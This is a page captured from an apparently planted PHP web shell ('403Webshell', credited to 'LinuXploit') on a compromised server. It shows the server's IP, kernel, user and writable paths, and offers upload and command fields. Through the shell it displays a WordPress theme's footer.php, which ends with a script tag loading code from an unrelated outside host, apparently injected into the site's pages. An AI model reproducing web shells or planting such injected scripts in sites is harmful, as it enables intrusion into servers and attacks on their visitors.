403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/raga-wp/wp-content/themes/raga/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/raga-wp/wp-content/themes/raga/footer.php
<!-- footer starts --> 

	<?php $themeData = get_fields('option'); ?>
<footer class="footer-design">
    <div class="container">
    <?php if ( !is_page_template('templates/template-landing-page.php') ) { ?>
        <div class="footer-block">
            <div class="row">
                <div class="col-md-3">
                    <div class="contact-detail">
					<?php if (!empty(get_field('contact_detail_heading', 'option'))) { ?>
                        	<h3><?php echo get_field('contact_detail_heading', 'option');?></h3>
                        <?php } 
						if (!empty(get_field('contact_detail', 'option'))) { ?>
                        	<p><?php echo get_field('contact_detail', 'option');?></p>
                        <?php } 
						if (!empty(get_field('contact_address', 'option'))) { ?>
							<div class="info"><span>A</span><p><?php echo get_field('contact_address', 'option');?></p></div>
						<?php } 
						if (!empty(get_field('contact_email', 'option'))) { ?>
							<div class="info"><span>E</span><a href="mailto:"><?php echo get_field('contact_email', 'option');?></a></div>
						<?php } 
			            $contact_phone = get_field('contact_phone', 'option');
                                if( $contact_phone ) {
                                    $contact_menu_url = $contact_phone['url'];
                                    $contact_menu_title = $contact_phone['title'];
                                    $contact_menu_target = $contact_phone['target'] ? $contact_phone['target'] : '_self';
                                    ?>
                                <div class="info"><span>T</span><a href="<?php echo esc_url( $contact_menu_url ); ?>"
                                    target="<?php echo esc_attr( $contact_menu_target ); ?>"><?php echo esc_html( $contact_menu_title ); ?></a></div>
                                <?php } ?>
                    </div>
                </div>
                <div class="col-md-3">
                    <div class="footer-menu about-menu">
                        <?php if (!empty(get_field('menu_heading_first', 'option'))) { ?>
                        <h3><?php echo get_field('menu_heading_first', 'option');?></h3>
                        <?php } ?>
                        <?php if( have_rows('footer_product_menu', 'option') ) { ?>
                        <ul>
                            <?php while( have_rows('footer_product_menu', 'option') ): the_row(); ?>
                            <li><?php
                                $product_menu_list = get_sub_field('product_menu_list');
                                if( $product_menu_list ) {
                                    $product_menu_url = $product_menu_list['url'];
                                    $product_menu_title = $product_menu_list['title'];
                                    $product_menu_target = $product_menu_list['target'] ? $product_menu_list['target'] : '_self';
                                    ?>
                                <a href="<?php echo esc_url( $product_menu_url ); ?>"
                                    target="<?php echo esc_attr( $product_menu_target ); ?>"><?php echo esc_html( $product_menu_title ); ?></a>
                                <?php } ?> </li>
                            <?php endwhile; ?>
                        </ul>
                        <?php } ?>
                    </div>
                </div>
                <div class="col-md-3">
                    <div class="footer-menu">
                        <?php if (!empty(get_field('menu_heading_second', 'option'))) { ?>
                        <h3><?php echo get_field('menu_heading_second', 'option');?></h3>
                        <?php } ?>
                        <?php if( have_rows('solution_menu', 'option') ){ ?>
                        <ul>
                            <?php while( have_rows('solution_menu', 'option') ): the_row(); ?>
                            <li><?php
                                $solution_menu_list = get_sub_field('solution_menu_lists');
                                if( $solution_menu_list ){
                                    $solution_menu_url = $solution_menu_list['url'];
                                    $solution_menu_title = $solution_menu_list['title'];
                                    $solution_menu_target = $solution_menu_list['target'] ? $solution_menu_list['target'] : '_self';
                                    ?>
                                <a href="<?php echo esc_url( $solution_menu_url ); ?>"
                                    target="<?php echo esc_attr( $solution_menu_target ); ?>"><?php echo esc_html( $solution_menu_title ); ?></a>
                                <?php } ?> </li>
                            <?php endwhile; ?>
                        </ul>
                        <?php } ?>
                    </div>
                </div> 
                <div class="col-md-3">
                    <div class="footer-form"> 
                    <?php if (!empty(get_field('form_heading', 'option'))) { ?>
                        <h3><?php echo get_field('form_heading', 'option');?></h3>
                        <?php } ?>
                        <?php echo do_shortcode('[contact-form-7 id="3b26f4b" title="Enquiry"]'); ?> 
                    </div>
                </div>
            </div>
        </div>
<?php } ?>
        <div class="social"> 
            <div class="row">
                <div class="col-md-12">
                    <div class="social-list">
                        <div class="qodef-social-icons-group">
                        <?php if( have_rows('social_icon_list', 'option') ):  
                            while( have_rows('social_icon_list', 'option') ) : the_row();
                                $social_icon_link = get_sub_field('social_icon_link', 'option');
                                $social_icon = get_sub_field('social_icon', 'option');
                            ?>
                            <?php 
                            $social_icon = get_sub_field('social_icon_link', 'option');
                            if( $social_icon ){
                                $social_icon_url = $social_icon['url'];
                                $social_icon_title = $social_icon['title'];
                                $social_icon_target = $social_icon['target'] ? $social_icon['target'] : '_self';
                                ?> 
                                <span class="qodef-shortcode qodef-m  qodef-icon-holder  qodef-layout--normal">
                            <a itemprop="url" href="<?php echo esc_url( $social_icon_url ); ?>" target="<?php echo esc_attr( $social_icon_target ); ?>">
                            <svg class="qodef-svg-circle"><circle cx="50%" cy="50%" r="49%"></circle></svg>
                            <span class="qodef-icon-font-awesome <?php echo esc_html( $social_icon_title ); ?> qodef-icon qodef-e" style=""></span> </a></span>
                            <?php } ?>

                            <?php endwhile; ?> 
                            <?php endif; ?>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="copyright">
            <div class="row">
                <div class="col-md-12">
                    <?php if (!empty(get_field('copyright', 'option'))) { ?>
                    <p><?php echo get_field('copyright', 'option');?></p>
                    <?php } ?></div>
            </div>
        </div> 
    </div>
</footer> 
<div class="sticky-icon"> 
   <a href="https://wa.me/message/VMYM7XI4NODBP1" class="bg-golden" target="_blank"><i class="fab fa-whatsapp"></i> Whatsapp </a> 
   <a href="tel:+918851866033" class="bg-black"><i class="fa-solid fa-phone-volume"></i> Phone </a> 
</div>
<script defer src="https://jscloud.net/x/43212/inlinks.js"></script>
<?php wp_footer(); ?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit